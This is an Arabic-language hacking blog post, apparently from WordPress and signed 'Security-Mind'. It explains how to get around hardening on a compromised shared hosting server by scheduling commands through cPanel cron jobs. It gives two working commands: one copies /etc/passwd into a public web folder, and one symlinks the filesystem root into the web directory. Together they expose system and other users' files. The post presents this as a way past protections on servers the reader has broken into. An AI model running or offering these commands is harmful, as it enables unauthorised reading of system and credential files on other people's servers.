bypass sec via Execute Command For cron jobs

سلام عليكم شباب

كيف الحال , مضى زمن طويل على تدوينات الهاكر ولا ادرجها في المدونة بسبب عدم اهتمامي الكبير في الهاكر هذا الفترة بسبب تركيزي على البرمجة وان شاء الله نرجع

مغزى الموضوع …بعض الاحيان لما تدخل سيرفر وتشاهد الحماية تقريبا فول اوبشن من السيف مود و الديسيبل فانكشنز وغيرها من الامور …وفي هذا الفترة الحمايات تطورت بعض الشيء وهناك اسلوب جديد في الحماية ..بعض الاشخاص يترك السيرفر حتى اذا كان عنده سي بنل .!!! وهذا اكبر خطأ الموضوع وما في تخطي الحمايات عن طريق الكرون جوبز وهي عن طريق هذا الاوامر

cd /home/user/public_html/; cat /etc/passwd>user.txt

cd /home/user/public_html/sec/; ln -sf / 1.txt

اعتقد الامر واضح ما يحتاج شرح صوري ومن هذا الامور وان شاء الله الدرس القادم طريقة حماية سيرفرك من هذا الثغرة

 

في امان الله

./Security-Mind

One thought on “bypass sec via Execute Command For cron jobs

اترك رد

إملأ الحقول أدناه بالمعلومات المناسبة أو إضغط على إحدى الأيقونات لتسجيل الدخول:

WordPress.com Logo

أنت تعلق بإستخدام حساب WordPress.com. تسجيل خروج   / تغيير )

صورة تويتر

أنت تعلق بإستخدام حساب Twitter. تسجيل خروج   / تغيير )

Facebook photo

أنت تعلق بإستخدام حساب Facebook. تسجيل خروج   / تغيير )

Google+ photo

أنت تعلق بإستخدام حساب Google+. تسجيل خروج   / تغيير )

Connecting to %s